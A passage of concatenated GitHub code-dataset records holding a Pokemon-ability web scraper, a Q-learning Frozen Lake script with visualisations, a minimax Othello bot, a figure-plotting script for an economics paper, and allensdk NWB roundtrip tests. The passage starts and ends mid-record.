bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom typing import List, NamedTuple\nimport psycopg2\n\nurl = \"https://pokemondb.net/ability\"\nrequest = Request(\n url,\n headers={'User-Agent': 'Mozilla/5.0'}\n)\n\npage = urlopen(request)\npage_content_bytes = page.read()\npage_html = page_content_bytes.decode(\"utf-8\")\nsoup = BeautifulSoup(page_html, \"html.parser\")\n\nAbility = []\nability_rows = soup.find_all(\"table\", id=\"abilities\")[0].find_all(\"tbody\")[0].find_all(\"tr\")\nfor ability in ability_rows[0:320]:\n ability_name = ability.find_all(\"td\")[0].find_all(\"a\")[0].getText()\n print(ability_name)\n ability_description = ability.find_all(\"td\", {\"class\": \"cell-med-text\"})[0].getText()\n print(ability_description)\n\n Ability.append((ability_name, ability_description))\n\n\n conn = psycopg2.connect(dbname='postgres', user='User', password='', host='localhost')\n cursor = conn.cursor()\n\n cursor.executemany(\"INSERT INTO abilities VALUES (%s, %s)\", Ability)\n conn.commit()\n conn.close\n\n Ability.clear()\n\n\n\n\n\n\n\n","repo_name":"NotBadTime/Python_Parcer","sub_path":"Abilities.py","file_name":"Abilities.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37036639609","text":"\"\"\"\nCreated on Fri Jul 17 19:10:42 2020\n@author: David\nEdited on Jul 21, 2020 by Jason\n\nThis is an algorithm to implement Q learning on a Frozen Lake game\n\nThis code is created by using the following Github repo as a template:\n https://github.com/OmarAflak/FrozenLake-QLearning/blob/master/qlearning.py\n\"\"\"\n#%% INITIALIZATION AND FILE DIRECTORIES\n\n#initialize\nfrom time import sleep\nimport numpy as np\nimport gym\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.animation as animation\nimport seaborn\nimport os\nfrom os import startfile\n\nfn_path = 'QL_Iterations.mp4' #filename for path video\nfn_epsilon = 'QL_Eps.png' #filename for epsilon vs iteration graph\nfn_heatmap = 'QL_Heatmap.mp4' #filename for heatmap video\ncdir = os.path.abspath(os.getcwd()) #current directory (directory files will be saved to)\nviddir_path = os.path.join(cdir,fn_path) #directory path video will be saved to\nfigdir_eps = os.path.join(cdir,fn_epsilon) #directory graph image will be saved to\nviddir_hm = os.path.join(cdir,fn_heatmap) #directory heatmap video will be saved to\n\n#%% GENERATE ENVIRONMENT\nenv = gym.make('FrozenLake8x8-v0')\n\n# Environment - uncomment one of these for custom maps (required for animations)\n#custom_map = ['SFFF','FHFH','FFFH','HFFG'] #standard 4x4 map\ncustom_map = ['SFFFFFFF', 'FFFFFFFF', 'FFFHFFFF', 'FFFFFHFF', 'FFFHFFFF', 'FHHFFFHF', 'FHFFHFHF', 'FFFHFFFG'] # added by Jason - standard 4x4 map (uncomment for custom map)\n#env = gym.make('FrozenLake-v0', is_slippery=True, desc=custom_map)\n\nprint(\"\")\nprint('Lake Visualization:')\nprint('S=Start, F=Frozen, H=Hole, G=Goal')\nenv.render()\n\n#Create numerical representation of frozen lake (as an array)\n#-1 = start, 0 = hole, 1 = frozen, 2 = end\nnrow = env.nrow\nncol = env.ncol\nlake = [[None]*ncol for _ in range(nrow)]\nfor i in range(0,len(custom_map)):\n tmpstr = custom_map[i]\n \n for j in range(0,len(tmpstr)):\n if tmpstr[j] == 'S':\n lake[i][j] = -1\n elif tmpstr[j] == 'H':\n lake[i][j] = 0\n elif tmpstr[j] == 'F':\n lake[i][j] = 1\n elif tmpstr[j] == 'G':\n lake[i][j] = 2\nlake = np.array(lake) \n\ninputCount = env.observation_space.n\nactionsCount = env.action_space.n\n \n#%% DEFINE FUNCTIONS FOR VISUALIZATION\n\nvizit = 1000 #number of iterations between path visualizations\nhmit = 15 #numer of iterations between heatmap visualizations\n\ndef movefun(s0,s1,moves):\n if s1-s0 == -1: #robot moved left = 0\n moves.append(0)\n elif s1-s0 == ncol: #robot moved down = 1\n moves.append(1)\n elif s1-s0 == 1: #robot moved right = 2\n moves.append(2)\n elif s1-s0 == -ncol: #robut moved up = 3\n moves.append(3)\n else: #robot didn't move = 4\n moves.append(4)\n \n return moves\n\ndef robotloc(moves,x0,y0):\n x = [None]*(len(moves))\n y = [None]*(len(moves))\n \n i = 0\n for m in moves: \n if m == 0:\n x[i] = x[i-1]-1\n y[i] = y[i-1]\n elif m == 1:\n x[i] = x[i-1]\n y[i] = y[i-1]-1\n elif m == 2:\n x[i] = x[i-1]+1\n y[i] = y[i-1]\n elif m == 3:\n x[i] = x[i-1]\n y[i] = y[i-1]+1\n elif m == 4:\n x[i] = x[i-1]\n y[i] = y[i-1]\n else:\n x[i] = x0\n y[i] = y0\n \n i+=1\n return x, y\n\ndef animatepath(j):\n if j == 0:\n line.set_xdata(x[j])\n line.set_ydata(y[j])\n else:\n k=j\n while k > 0:\n if moves[k] == -1:\n break\n k = k-1\n line.set_xdata(x[k:j+1])\n line.set_ydata(y[k:j+1])\n point.set_xdata(x[j])\n point.set_ydata(y[j])\n plt.title('Episode %i' %itnum[j])\n\n return line,\n\ndef animateheatmap(j):\n plt.cla()\n Val_reshaped = np.reshape(Qval[j,:],(nrow,ncol))\n p = seaborn.heatmap(Val_reshaped, cmap=cmap, vmin=vmin, vmax=vmax, cbar=False,\n square=True, xticklabels=ncol+1, yticklabels=nrow+1,\n linewidths=.5, ax=ax3, annot=True, fmt=\".3f\")\n for i in range(len(lake)):\n for ii in range(len(lake[0])):\n plt.text(i+0.4,ii+0.25,custom_map[ii][i],fontsize=14)\n \n for k in range(len(Qdir[j])):\n xk = (k % ncol) + 0.4\n yk = (k // nrow) + 0.8\n arrow = Qdir[j,k]\n if arrow == 0:\n plt.text(xk, yk, u'\\u2190', fontsize=14)\n elif arrow == 1:\n plt.text(xk, yk, u'\\u2193', fontsize=14)\n elif arrow == 2:\n plt.text(xk, yk, u'\\u2192', fontsize=14)\n else:\n plt.text(xk, yk, u'\\u2191', fontsize=14)\n \n plt.title('Episode %i' %Qit[j])\n \n return p\n\n#%% TRAIN ROBOT\n# Initialize Q-Table\ninputCount = env.observation_space.n\nactionsCount = env.action_space.n\n#Set inital values of Q table to zero\nQ = {}\nfor i in range(inputCount):\n Q[i] = np.zeros(actionsCount)\n\n\"\"\"\nThe parameters listed are as follows:\n lr = learning rate\n lrMin = minimum learning rate\n lrDecay = rate of decay of learning rate\n gamma = discount factor\n epsilon = variable specifying how often we choose a random action\n epsilonMin = minimum epsilon value\n epsilonDecay = rate of epsilon decay\n episodes = # of training episodes to run\n\nThe way this algorithm works is by first initailizing a 'Q-table' which, at each location, stores 'quality' values for each possible action\nThese quality values are based on anticipated future reward\nInitially, the Q table is set randomly and the algorithm updates it each iteration (or episode) based on reward\nWhen the actor goes to make a decision on what action to take, the actor will either pick the action which has the highest q value or pick a random action\nThe chance that the actor picks a random action rather than an action based on q value is based on the hyperparameter 'epsilon'\nThis randomness helps the actor explore new paths rather than getting trapped in one path\nThe epsilon value starts high to encourage exploration but slowly decays each iteration as the specified path should become more clear\n\"\"\"\n\n## Hyperparameters\nlr = 0.33\nlrMin = 0.001\nlrDecay = 0.99999\ngamma = 1.0\nepsilon = 1.0\nepsilonMin = 0.001\nepsilonDecay = 0.97\nepisodes = 4000\nrewardWin = 1\nrewardLose = -1\nrewardMove = 0\n\n# Variables needed to create visualizations\nepsplot = [epsilon]\nQval = np.zeros((int(np.ceil(episodes/hmit)+1),int(nrow*ncol)))\nQdir = np.zeros((int(np.ceil(episodes/hmit)+1),int(nrow*ncol)))\nQit = np.zeros(int(np.ceil(episodes/hmit)+1))\n\n\n# Training\navgR = np.zeros(int(episodes/50))\nfor i in range(episodes):\n #print(\"Episode {}/{}\".format(i + 1, episodes))\n s = env.reset()\n done = False\n\n # update list of moves to say it reset - for path movie\n if i == 0 or (i+1) % vizit == 0 or i == episodes-1:\n if i == 0:\n moves = [-1]\n itnum = [1]\n else:\n moves.append(-1)\n itnum.append(i+1)\n\n # Iterate the path\n while not done:\n #determine if we want to explore or base our action on the Q table\n if np.random.random() < epsilon:\n a = np.random.randint(0, actionsCount)\n else:\n a = np.argmax(Q[s])\n \n #evaluate the result of the action taken\n newS, r, done, _ = env.step(a)\n \n #Manually change the reward structure to negatively reward travel and falling in holes and positvely reward reaching the goal\n if done and r==0:\n r = rewardLose\n elif done and r==1:\n r = rewardWin\n else:\n r = rewardMove\n \n #Update the Q table with the Bellman equation\n Q[s][a] = Q[s][a] + lr * (r + gamma * np.max(Q[newS]) - Q[s][a])\n \n #Update moves array with the last move - for path movie\n if i == 0 or (i+1) % vizit == 0 or i == episodes-1:\n moves = movefun(s,newS,moves)\n itnum.append(i+1)\n\n # Update s, learning rate, and epsilon\n s = newS\n \n #decay the learning rate\n if lr > lrMin:\n lr *= lrDecay\n\n #decrease exploration rate if we reach the goal\n if r==rewardWin and epsilon > epsilonMin:\n epsilon *= epsilonDecay\n \n #store epsilon value for epsilon vs iteration plot\n epsplot.append(epsilon)\n \n #store Q matrix values for heatmap plot\n if i==0:\n Qit[i] = i+1\n for tile in range(nrow*ncol):\n Qval[i,tile] = max(Q[tile])\n Qdir[i,tile] = np.argmax(Q[tile])\n elif (i+1) % hmit == 0:\n Qit[int((i+1)/hmit)] = i+1\n for tile in range(nrow*ncol):\n Qval[int((i+1)/hmit),tile] = max(Q[tile])\n Qdir[int((i+1)/hmit),tile] = np.argmax(Q[tile])\n elif i == episodes-1:\n Qit[-1] = i+1\n for tile in range(nrow*ncol):\n Qval[-1,tile] = max(Q[tile])\n Qdir[-1,tile] = np.argmax(Q[tile])\n \n #Test performance over training iterations\n if i%50==0:\n for j in range(100):\n s = env.reset()\n done = False\n while not done:\n a = np.argmax(Q[s])\n newS, r, done, _ = env.step(a)\n s = newS\n avgR[int(i/50)] += r/100.\n\nindex = [i for i in range(int(episodes/50))]\nindex = np.array(index)*50\nplt.plot(index,avgR)\nplt.xlabel('Iteration')\nplt.ylabel('Average Success Rate')\nplt.title('Q-Learning - Average Success Rate over 100 Episodes') \n \n\nprint(\"\")\nprint(\"Learning Rate :\", lr)\nprint(\"Epsilon :\", epsilon)\n\n#%% TEST SOLUTION ON FROZEN LAKE\nprint(\"\\nPlay Game on 100 episodes...\")\n\navg_r = 0\nfor i in range(100):\n s = env.reset()\n done = False\n\n while not done:\n a = np.argmax(Q[s])\n newS, r, done, _ = env.step(a)\n s = newS\n\n avg_r += r/100.\n\nprint(\"Number of successes out of 100 episodes :\", np.round(avg_r*100))\n\n\n#%% CREATE GRAPHICS AND MOVIES\n# 1) Video of the path that is generated on selected iterations\n# 2) Graph of Epsilon vs Iteration\n# 3) Video of the evolution of the Q-Dictionary\n\nprint(\"\")\nprint('Generating Visuals...')\n\n# 1 - Path Video\n#create figure\nplt.figure(1)\nfig1, ax1 = plt.subplots()\nax1.xaxis.set_ticks([])\nax1.yaxis.set_ticks([])\n#create lake background\nplt.xlim(0,ncol)\nplt.ylim(0,nrow)\nplt.axis('square')\ncolormap = ListedColormap(['g','b','c','y'])\nc = ax1.pcolor(np.linspace(0,ncol,ncol+1),np.linspace(0,nrow,nrow+1),list(lake[::-1]),cmap=colormap,alpha=0.4) \n\n#place points on lake to generate variables to call in animation\n# each data set (the line and the final point) have a separate name\nx, y = robotloc(moves,0.5,nrow-.5)\nline, = ax1.plot(x[0],y[0],'ko-')\npoint, = ax1.plot(x[0],y[0],'r*',markersize=15)\nplt.title('Episode 0')\n\n#Reset the counter variables for the animation function.\n# for some reason if j isn't reset, it can get buggy\nj=0\nk=0\n#Create and save Visual #1 (Path video)\nani = animation.FuncAnimation(fig1, animatepath, interval=1, save_count=len(x))\n\nplt.rcParams['animation.ffmpeg_path'] ='C:\\\\Program Files\\\\Python\\\\ffmpeg-20200713-7772666-win64-static\\\\bin\\\\ffmpeg.exe'\nFFwriter=animation.FFMpegWriter(fps=10, extra_args=['-vcodec', 'libx264'])\nani.save(fn_path, writer=FFwriter)\n\nplt.show()\n\n############################################################################\n\n#Create plot of epsilon vs iteration\nfig2 = plt.figure(2)\nplt.plot(np.linspace(1,len(epsplot),len(epsplot)),epsplot)\nplt.plot([1,len(epsplot)],[epsilonMin,epsilonMin],'r--')\nplt.title('Epsilon Value')\nplt.xlabel('Episode')\nplt.ylabel('Epsilon')\nplt.legend(['Epsilon','Threshold'])\n\nplt.savefig(figdir_eps)\n\nplt.show()\n\n#############################################################################\n#Create evolving Q-dictionary heatmap\nplt.figure(3) #new figure\nfig3, ax3 = plt.subplots(figsize=(11, 9)) #needs to be a subplot to call the axis\n\nvmax = np.ceil(np.max(Qval)*100)/100 #max value in Qval for upper limit of heatmap color scale\nvmin = np.ceil(np.min(Qval)*100)/100 #min value in Qval for upper limit of heatmap color scale\nvmax = max([abs(vmax),abs(vmin)]) #center the vmax and vmin values so 0=white tile\nvmin = -vmax\ncmap = seaborn.diverging_palette(10, 220, sep=80, as_cmap=True) #define diverging colormap\n#cmap = seaborn.light_palette((210, 90, 60), input=\"husl\", as_cmap=True) #define colormap (not diverging)\nVal_reshaped = np.reshape(Qval[0,:],(nrow,ncol)) #reshape values from Qval into array the size of the lake\n#draw the heatmap\np = seaborn.heatmap(Val_reshaped, cmap=cmap, vmin=vmin, vmax=vmax,\n square=True, xticklabels=ncol+1, yticklabels=nrow+1,\n linewidths=.5, cbar_kws={\"shrink\": .5}, ax=ax3, annot=True, fmt=\".3f\")\n#Add labels to each point on lake (start, hole, frozen, goal)\nfor i in range(len(lake)):\n for ii in range(len(lake[0])):\n plt.text(i+0.4,ii+0.2,custom_map[ii][i],fontsize=14)\n \n#Reset the counter variables for the animation function.\n# for some reason if j isn't reset, it can get buggy \nj=0\nk=0\n#Create and save Visual #3 (Heatmap video)\nani = animation.FuncAnimation(fig3, animateheatmap, interval=1, save_count=len(Qit))\n\nplt.rcParams['animation.ffmpeg_path'] ='C:\\\\Program Files\\\\Python\\\\ffmpeg-20200713-7772666-win64-static\\\\bin\\\\ffmpeg.exe'\nFFwriter=animation.FFMpegWriter(fps=24, extra_args=['-vcodec', 'libx264'])\nani.save(fn_heatmap, writer=FFwriter)\n\nplt.show()\n\nprint('Done')\n\n#Automatically open visualization files\n# startfile(viddir_path)\n# startfile(figdir_eps)\n# startfile(viddir_hm)","repo_name":"Cbiswadeep/ECE-6254-Project","sub_path":"Q_Learning.py","file_name":"Q_Learning.py","file_ext":"py","file_size_in_byte":13603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28554181816","text":"\n\"\"\"\n===================================================================================\nName: computer_player.py\nAuthor: Madi Sanchez-Forman\nVersion: 5.10.23\nDecription: This script builds a bot to play Othello using minimax with alpha-beta\npruning. Heuristic approach is based off of evaluation proposed in:\nhttps://courses.cs.washington.edu/courses/cse573/04au/Project/mini1/RUSSIA/Final_Paper.pdf\nwith some slight changes. \n===================================================================================\n\"\"\"\nfrom board import Board\nimport math\n\n#******************* Constants ***************************#\nSTATIC_WEIGHTS = [ #These are the weights of each spot on the board. The numbers are as described in the paper linked above\n [20, -3, 11, 8, 8, 11, -3, 20],\n [-3, -7, -4, 1, 1, -4, -7, -3],\n [11, -4, 2, 2, 2, 2, -4, 11],\n [8, 1, 2, -3, -3, 2, 1, 8],\n [8, 1, 2, -3, -3, 2, 1, 8],\n [11, -4, 2, 2, 2, 2, -4, 11],\n [-3, -7, -4, 1, 1, -4, -7, -3],\n [20, -3, 11, 8, 8, 11, -3, 20]\n]\nSIZE = 8 #size of board\nEMPTY, BLACK, WHITE = '.', '*', 'o' #tiles\n\n#******************* Computer Player class ***************************#\nclass Computer_Player:\n def __init__(self, max_id, difficulty_level):\n \"\"\"\n Initalizes an instance of Computer Player. It takes the ID of the AI and the number of plies to look ahead during MiniMax\n \"\"\"\n assert max_id == 'B' or 'W' #class must use an id that is either 'B' or 'W'\n assert difficulty_level > 0\n self.difficulty = difficulty_level #number of plies to look ahead\n self.max_id = max_id \n if self.max_id == 'B':\n self.min_id = 'W' #storing the id of the other player\n self.TILES_TO_COLOR = {self.max_id: BLACK, self.min_id: WHITE} #maps id -> tile\n else:\n self.min_id = 'B'\n self.TILES_TO_COLOR = {self.max_id: WHITE, self.min_id: BLACK}\n\n def pick_move(self, board):\n \"\"\"\n Pick_move() calls Minimax on the different possible moves and then finds the one with the highest score.\n After the best move is found, it uses the Board class to flip the tiles\n Params: instance of board class\n Returns: None\n \"\"\"\n possible_moves = board.all_legal_moves(self.max_id) #get all legal boards associated with our ID\n best_val = -math.inf\n best_x, best_y = 0, 0\n best_tiles = []\n for x,y in possible_moves: #for each move\n tiles_flipped = board.find_tiles_taken(x, y, self.TILES_TO_COLOR[self.max_id]) #find tiles that will flip\n move_score = self.minimax_AB(board, self.difficulty, self.max_id, -math.inf, math.inf) #score the move\n if move_score > best_val: #remember move with best score\n best_x, best_y = x, y\n best_val = move_score\n best_tiles = tiles_flipped\n board.flip_tiles(best_tiles, self.max_id) #flip tiles for that move\n print(\"Computer chose: \" + \"[\" + str(best_x + 1) + \",\" + str(best_y + 1) + \"]\") #print move chosen for clarity\n\n def minimax_AB(self, board, depth, cur_id, alpha, beta):\n \"\"\"\n mininimax_AB() performs the depth first tree search on an instance of a board for a given number of plies. \n params: Instance of board, depth of recursion, ID of current player, alpha and beta values\n returns: best_score -> score of the board\n \"\"\"\n if depth == 0 or board.is_terminal(): #if the game is over\n return self.heuristic_score(board, cur_id) #return heuristic value of the board\n if cur_id == self.max_id: #if maximizing\n best_score = -math.inf\n possible_moves = board.all_legal_moves(cur_id) #find all possible moves\n if not possible_moves: #python idiom for checking if a list is empty\n best_score = self.minimax_AB(board, depth, self.min_id, alpha, beta) #if there are no possible moves, minimizing player goes twice\n for x, y in possible_moves: #for each move\n tiles = board.find_tiles_taken(x, y, self.TILES_TO_COLOR[self.max_id]) #find and flip the tiles on the board without making copy\n board.flip_tiles(tiles, self.max_id)\n score = self.minimax_AB(board, depth - 1, self.min_id, alpha, beta) #score the board\n best_score = max(best_score, score) \n alpha = max(alpha, score)\n board.undo_move(tiles, self.max_id) #replace tiles\n if beta <= alpha: #if it is not better than anything we have seen -> prune\n break\n else:\n best_score = math.inf #inverse of above for min player\n possible_moves = board.all_legal_moves(self.min_id)\n if not possible_moves:\n best_score = self.minimax_AB(board, depth, self.max_id, alpha, beta)\n for x, y in possible_moves:\n tiles = board.find_tiles_taken(x, y, self.TILES_TO_COLOR[self.min_id])\n board.flip_tiles(tiles, self.min_id)\n score = self.minimax_AB(board, depth - 1, self.max_id, alpha, beta)\n best_score = min(best_score, score)\n beta = min(beta, score)\n board.undo_move(tiles, self.min_id)\n if beta <= alpha:\n break\n return best_score\n \n def heuristic_score(self, board, cur_id):\n \"\"\"\n Heuristic_score() calculates the heuristic value of the board\n Params: an instance of Board class, and the id of current player.\n returns: Float score of board\n \"\"\"\n #NOTE: Instead of using a function to check for corner spots and edges, I used the static weights of the board as proposed in the essay, I wanted a mix of a dynamic and static heuristic\n score = 0\n score += self.coin_parity(board) \n score += self.mobility_score(board) \n score += self.static_score(board, cur_id)\n return score\n \n def coin_parity(self, board):\n \"\"\"\n Coin_parity compares the number of max and mins tiles, except it aims to minimize its own tiles and maximize the opponents during the beginning of the game.\n When the game is closer to the end, it will switch to maximizing its tiles. \n params: instance of Board class\n returns: float coin parity score of board \n \"\"\"\n score = board.get_score()\n max_coins, min_coins = score[self.max_id], score[self.min_id]\n if not board.is_end_game(): #if it is not the end of the game => minimize tiles\n return -10 * (max_coins - min_coins) / (max_coins + min_coins)\n else:\n return 10 * (max_coins - min_coins) / (max_coins + min_coins) #otherwise we want to maximize them\n \n def mobility_score(self, board):\n \"\"\"\n Mobily_score aims to estimate the future mobility (number of possible future moves) for each player, so that max can attempt to restrict the opponents mobility while\n maximizing their own.\n params: instance of Board class\n returns: float mobility score of board\n \"\"\"\n max_moves, min_moves = len(board.all_legal_moves(self.max_id)), len(board.all_legal_moves(self.min_id))\n if max_moves > 0 and min_moves == 0: #want to favor bot getting two turns in a row, so if possible make note of that\n return 30\n elif max_moves == 0 and min_moves > 0: #do not want bot to give opponent two turns in a row\n return -30\n elif max_moves + min_moves == 0:\n return 0\n else:\n return 10 * (max_moves - min_moves) / (max_moves + min_moves)\n\n def static_score(self, board, cur_id):\n \"\"\"\n Static score uses the static weights array to score the board, favoring corner positions. \n params: instance of board class and id of current player\n returns: integer score of board\n \"\"\"\n score = 0\n for x in range(SIZE):\n for y in range(SIZE):\n if board.array[x][y] == cur_id:\n score += STATIC_WEIGHTS[x][y]\n return score","repo_name":"madiforman/reversi","sub_path":"computer_player.py","file_name":"computer_player.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75210779683","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport wandb\nfrom mpl_toolkits.axes_grid1.inset_locator import (\n zoomed_inset_axes,\n mark_inset,\n inset_axes,\n)\nfrom utilities import get_results_by_tag, plot_params\n\noutput_dir = \"./figures\"\nplot_name = \"growth_sequential_g0_one_run\"\noutput_path = output_dir + \"/\" + plot_name + \".pdf\"\ntag = \"growth_sequential_g0_one_run\"\napi = wandb.Api()\nproject = \"highdimensionaleconlab/deep_learning_transversality\"\nparams = plot_params((10, 4.5))\n\n# artifact and config\nresults = get_results_by_tag(api, project, tag, get_test_results=True, max_runs=1)\nassert results.id.nunique() == 1\nparameters = get_results_by_tag(api, project, tag, get_config=True, max_runs=1)\nmax_T_test = int(parameters[\"test_T\"])\nmax_T = int(parameters[\"train_t_max\"]) + 1\n\n\nk_sol = results[\"k_t_sol\"]\nc_sol = results[\"c_t_sol\"]\nk_0 = results[\"k_t_approx\"]\nc_0 = results[\"c_t_approx\"]\nk_0_error = results[\"k_rel_error\"]\nc_0_error = results[\"c_rel_error\"]\n\nt = np.array(range(0, max_T_test))\n\n\nplt.rcParams.update(params)\n\nax_ck = plt.subplot(121)\nplt.plot(k_sol, \"black\", linestyle=\"dashed\", label=r\"$k(t)$\")\nplt.plot(k_0, \"black\", label=r\"$\\hat{k}(t)$\")\nplt.plot(c_sol, \"blue\", linestyle=\"dashed\", label=r\"$c(t)$\")\nplt.plot(c_0, \"blue\", label=r\"$\\hat{c}(t)$\")\nplt.axvline(x=max_T - 1, color=\"0.0\", linestyle=\"dashed\")\nylim_min = 0.5 * np.amin(np.minimum(c_sol, c_0))\nylim_max = 1.2 * np.amax(np.maximum(k_sol, k_0))\nplt.ylim([ylim_min, ylim_max])\nhandles, labels = plt.gca().get_legend_handles_labels()\nby_label = dict(zip(labels, handles))\nplt.legend(by_label.values(), by_label.keys(), prop={\"size\": params[\"font.size\"]})\nplt.title(r\"Capital and Consumption: $\\hat{k}(t)$ and $\\hat{c}(t)$\")\nplt.xlabel(r\"Time($t$)\")\nplt.legend(loc=\"lower right\")\n\n\nax_errors = plt.subplot(122, sharex=ax_ck)\nplt.plot(t, k_0_error, \"black\", label=r\"$\\varepsilon_k(t)$\")\nplt.plot(t, c_0_error, \"blue\", label=r\"$\\varepsilon_c(t)$\")\nplt.title(r\"Relative errors: $\\varepsilon_k(t)$ and $\\varepsilon_c(t)$\")\nplt.axvline(x=max_T - 1, color=\"0.0\", linestyle=\"dashed\")\nplt.xlabel(r\"Time($t$)\")\nplt.tight_layout()\n\n\ntime_window = [18, 23]\nave_value = 0.5 * (k_sol[time_window[0]] + k_sol[time_window[1]])\nwindow_width = 0.015 * ave_value\nmatplotlib.rcParams.update({\"ytick.labelsize\": 8})\n\naxins = zoomed_inset_axes(\n ax_ck,\n 4,\n loc=\"upper center\",\n bbox_to_anchor=(0.5, 0.7, -0.3, 0.3),\n bbox_transform=ax_ck.transAxes,\n)\naxins.plot(k_sol, \"black\", linestyle=\"dashed\")\naxins.plot(k_0, \"black\")\n\nplt.axvline(x=max_T, color=\"0.0\", linestyle=\"dashed\")\nx1, x2, y1, y2 = (\n time_window[0],\n time_window[1],\n ave_value - window_width,\n ave_value + window_width,\n)\naxins.set_xlim(x1, x2)\naxins.set_ylim(y1, y2)\naxins.xaxis.tick_top()\nplt.xticks(fontsize=8, visible=False)\nplt.tick_params(axis=\"x\", which=\"both\", bottom=False, top=False, labelbottom=False)\nplt.yticks(fontsize=8)\nmark_inset(ax_ck, axins, loc1=1, loc2=3, linewidth=\"0.7\", ls=\"--\", ec=\"0.5\")\n\nplt.savefig(output_path)\n","repo_name":"HighDimensionalEconLab/transversality","sub_path":"generate_figures/growth_sequential_g0_one_run.py","file_name":"growth_sequential_g0_one_run.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8240444978","text":"import math\n\nimport numpy as np\nimport pandas as pd\nimport pynwb\nimport pytest\n\nimport allensdk.brain_observatory.nwb as nwb\nfrom allensdk.brain_observatory.behavior.session_apis.data_io import (\n BehaviorNwbApi)\nfrom allensdk.brain_observatory.behavior.stimulus_processing import \\\n StimulusTemplate, get_stimulus_templates\n\n\n# pytest fixtures:\n# nwbfile: test.brain_observatory.conftest\n# roundtripper: test.brain_observatory.conftest\n# running_speed: test.brain_observatory.conftest\n# running_acquisition_df_fixture: test.brain_observatory.behavior.conftest\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_running_acquisition_to_nwbfile(nwbfile, roundtrip, roundtripper,\n running_acquisition_df_fixture):\n nwbfile = nwb.add_running_acquisition_to_nwbfile(\n nwbfile, running_acquisition_df_fixture)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n obt_running_acq_df = obt.get_running_acquisition_df()\n\n pd.testing.assert_frame_equal(running_acquisition_df_fixture,\n obt_running_acq_df,\n check_like=True)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_running_speed_to_nwbfile(nwbfile, running_speed,\n roundtrip, roundtripper):\n\n nwbfile = nwb.add_running_speed_to_nwbfile(nwbfile, running_speed)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n obt_running_speed = obt.get_running_speed()\n\n assert np.allclose(running_speed.timestamps,\n obt_running_speed['timestamps'])\n assert np.allclose(running_speed.values,\n obt_running_speed['speed'])\n\n\n@pytest.mark.parametrize('roundtrip,behavior_stimuli_data_fixture',\n [(True, {}), (False, {})],\n indirect=[\"behavior_stimuli_data_fixture\"])\ndef test_add_stimulus_templates(nwbfile, behavior_stimuli_data_fixture,\n roundtrip, roundtripper):\n stimulus_templates = get_stimulus_templates(behavior_stimuli_data_fixture,\n grating_images_dict={})\n\n nwb.add_stimulus_template(nwbfile, stimulus_templates)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n stimulus_templates_obt = obt.get_stimulus_templates()\n\n assert stimulus_templates_obt == stimulus_templates\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_stimulus_presentations(nwbfile, stimulus_presentations_behavior,\n stimulus_timestamps, roundtrip,\n roundtripper,\n stimulus_templates: StimulusTemplate):\n nwb.add_stimulus_timestamps(nwbfile, stimulus_timestamps)\n nwb.add_stimulus_presentations(nwbfile, stimulus_presentations_behavior)\n nwb.add_stimulus_template(nwbfile=nwbfile,\n stimulus_template=stimulus_templates)\n\n # Add index for this template to NWB in-memory object:\n nwb_template = nwbfile.stimulus_template[stimulus_templates.image_set_name]\n compare = (stimulus_presentations_behavior['image_set'] ==\n nwb_template.name)\n curr_stimulus_index = stimulus_presentations_behavior[compare]\n nwb.add_stimulus_index(nwbfile, curr_stimulus_index, nwb_template)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(stimulus_presentations_behavior,\n obt.get_stimulus_presentations(),\n check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_stimulus_timestamps(nwbfile, stimulus_timestamps,\n roundtrip, roundtripper):\n\n nwb.add_stimulus_timestamps(nwbfile, stimulus_timestamps)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n np.testing.assert_array_almost_equal(stimulus_timestamps,\n obt.get_stimulus_timestamps())\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_trials(nwbfile, roundtrip, roundtripper, trials):\n\n nwb.add_trials(nwbfile, trials, {})\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(trials, obt.get_trials(), check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_licks(nwbfile, roundtrip, roundtripper, licks):\n\n nwb.add_licks(nwbfile, licks)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(licks, obt.get_licks(), check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_rewards(nwbfile, roundtrip, roundtripper, rewards):\n\n nwb.add_rewards(nwbfile, rewards)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n pd.testing.assert_frame_equal(rewards, obt.get_rewards(),\n 